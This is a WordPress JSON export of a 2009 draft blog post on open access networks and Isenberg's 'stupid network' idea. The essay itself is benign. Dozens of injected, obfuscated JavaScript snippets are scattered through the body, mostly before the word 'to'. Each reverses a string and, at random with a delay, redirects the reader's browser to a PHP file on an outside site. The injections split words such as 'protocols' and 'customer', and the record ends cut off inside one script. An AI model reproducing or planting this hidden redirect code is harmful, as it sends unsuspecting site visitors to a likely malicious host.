{"id":80,"date":"2009-01-18T15:25:10","date_gmt":"2009-01-18T15:25:10","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?p=80"},"modified":"2009-01-18T15:25:10","modified_gmt":"2009-01-18T15:25:10","slug":"openstupidnet","status":"publish","type":"post","link":"https:\/\/hindersby.net\/nywp\/?p=80","title":{"rendered":"The Only Really Open Net Is The Really Stupid Net !"},"content":{"rendered":"<h1>The Only Really Open Net Is The Really Stupid Net ! <\/h1>\n<p>(draft)<\/p>\n<p>Nisse Husberg, Dr.Techn.<\/p>\n<p>Many claim <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to have an &#8221;open access network&#8221; structure but in reality<br \/>this is not true in most cases. There are all kinds of limitations for<br \/>the openness.<\/p>\n<h2>Definition of Open Network<\/h2>\n<p>An open net cannot be compared <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to a telephone exchange (even with<br \/>digital packets). It must rather be compared <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the Post office where<br \/>the packets are sent <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the right destination no matter what they<br \/>contain. There are some technical limitations on weight and bulk (data<br \/>packet length) but in general the Post distributes anything.<\/p>\n<p>An open access network should have no limitations for the access <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to<br \/>any service of any kind anywhere in the Internet. There must be no<br \/>limitations of IP addresses <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to connect <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to, pro<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tocols used or ports<br \/>used. <\/p>\n<p><!--more--><\/p>\n<p>Clearly, this is not true of virtually any of those networks claiming<br \/><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to be &#8221;open access&#8221;. There is, however, no restrictions on the<br \/>services provided <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the net. If a service provider wants <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to limit the<br \/>access <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to his service in any way, it has nothing <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to do with the<br \/>network &#8211; as long as those restrictions are applied outside the net.<\/p>\n<p>It is also possible <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to require any kind of special hardware or<br \/>software <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to be installed at the cus<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tomer end &#8211; as long as it is outside<br \/>the net. <\/p>\n<p>&#8221;Outside the net&#8221; means often outside the terminal or router or<br \/>firewall connected <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the network. Sometimes this can be difficult<br \/><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to define exactly but as a general rule it must be possible <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to access<br \/>the net without any restrictions. If there is a cus<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tomer terminal that<br \/>contains restrictions in any way or of any kind which cannot be<br \/>switched off or bypassed, then the net is not open. The necessity <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to<br \/>use for example Ethernet in accessing the network cannot be seen as<br \/>such a restriction because Ethernet is already such a standard<br \/>pro<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tocol that the access of any service over the net hardly is<br \/>restricted. <\/p>\n<p>It is of course possible <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to have local nets which are very restricted<br \/>in many ways but they cannot be considered part of the open net in<br \/>that case.<\/p>\n<h2>The Stupid Net<\/h2>\n<p>&nbsp;<\/p>\n<p>The only really open network is the &#8221;stupid&#8221; net. It means that the<br \/>network is ONLY moving packets <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the right IP address. It does not<br \/>care at all what is inside the packets. There must not be any<br \/>&#8221;intelligence&#8221; inside the network &#8211; only at its edges. The concept was<br \/>first presented by David S. Isenberg in 1997: &#8221;Rise of the Stupid<br \/>Network&#8221;, Computer Telephony, August 1997, pp. 16-26. A later version<br \/>was published in 1998 &#8221;The Dawn of the Stupid Network&#8221;, ACM Networker<br \/>2.1, February\/March 1998, pp. 24-31. <\/p>\n<p>Basically it follows the KISS principle (Keep It Simple Stupid). The<br \/>original article is already over 10 years old but the ideas are even<br \/>more adequate <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>today with very fast networks (optical fibre) and fast<br \/>and cheap electronics.<\/p>\n<p>The main point is that the network should only move packets &#8211; it<br \/>should be &#8221;stupid&#8221;. If the intelligence is at the edges of the network<br \/>it is extremely flexible. Going in<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to new applications or pro<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tocols<br \/>does not change the network at all, just the equipment at the edge of<br \/>the network. It is also possible <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to use different applications at the<br \/>same time without problems.<\/p>\n<p>FLEXIBILITY is the most important feature of stupid networks and as<br \/>the applications change and new are invented all the time this is<br \/>really an enormous advantage. In fact we do not know what is behind<br \/>the corner in the development and the possibility <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to introduce new<br \/>applications very easily saves much time and money.<\/p>\n<p>All kinds of control and optimisation must be outside the stupid<br \/>network because they destroy the flexibility. Optimisation is also a<br \/>work which usually is wasted in the long run. The capacity increases<br \/>so fast that no optimisation is needed. Just as memory size increased<br \/>from a few kilobytes <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to Gigabytes, the speed of networks is increasing<br \/>from kbits\/s <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to Gbits\/s. The limit of a single fibre is about 10000<br \/>Gbits\/s which makes all optimisation quite unnecessary.<\/p>\n<p>Control is also a wasteful undertaking. All kinds of checks in the<br \/>network can easily be fooled, even by schoolchildren. It is much<br \/>better <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to put the equipment and programs at the edges of the network,<br \/>This also improves flexibility &#8211; it is possible <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to use any method and<br \/>change it at any time. <\/p>\n<p>This goes as well for security as for identification. Every network<br \/>must be seen as a hostile environment and you cannot rely on<br \/>anything. Thus building tunnels through the network with heavy coding<br \/>and identification equipment is much better. Also when these methods<br \/>change it does not mean that the network has <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to be changed. Again time<br \/>and money is saved.<\/p>\n<p>The stupid network (which <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to my mind is the only real data network as<br \/>opposed <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to old-fashioned tele networks) of course consists of several<br \/>small network &#8211; as Internet does. Especially for security reasons it<br \/>is necessary <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to insert firewalls between the networks. This makes it<br \/>hard for the crooks <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to get in<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the network but because they anyway<br \/>can infect careless and unsuspecting users computers, it is necessary<br \/><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to protect any connection at the edge of the network. Even simple<br \/>routers now have the basic functions built-in. But this is a field<br \/>where improvements happen often and therefore it is a good idea <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to<br \/>have a different router instead of a terminal with everything. Then it<br \/>is easy <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to change the router only. Possibly this will change so that<br \/>improvements can be downloaded easily. <\/p>\n<h2>Identification<\/h2>\n<p>&nbsp;<\/p>\n<p>One problem for services is how <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to identify a client. All ways of<br \/>doing it by structuring the net are inefficient and impose unnecessary<br \/>restrictions. And the worst thing is that they destroy the flexibility<br \/>of the network. <\/p>\n<p>Using VLAN for identifying (one client &#8211; one VLAN) is <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to utterly<br \/>destroy the structure of the network. It is an extremely inefficient<br \/>way. To use the MAC <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to identify a client is almost impossible because<br \/>it is so easy <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to change the MAC that any schoolboy can do it. The same<br \/>goes for using the IP-address of the client.<\/p>\n<p>In a stupid net the identification must be handled outside the<br \/>network. It is possible using passwords, programs or hardware and give<br \/>much better security. And it is very flexible. The client can move<br \/>around as much as he likes and the networks can be changed in any way<br \/>without interfering with the identification. As long as the network<br \/>passes the packets <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the right place everything will work.<\/p>\n<h2>Security<\/h2>\n<p>\u00a0Security is going <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to be one of the worst problems but it should not be<br \/>implemented within the network. Basic security can be handled with<br \/>routers and firewalls at the edges of the network &#8211; both at the<br \/>connection <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to Internet and at the connection of the user. Also local<br \/>networks must be considered insecure.<\/p>\n<p>For important tasks like banking or work over the net it is possible<br \/><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to use VPN tunnels or any kind of heavily coded transmission. This can<br \/>be implemented in software like the Secure Shell or hard coded. A<br \/>fairly secure and fast system is hardware at both ends of the<br \/>connection. <\/p>\n<p>One problem is, however, <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to achieve a common standard. It seems a<br \/>little unnecessary <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return 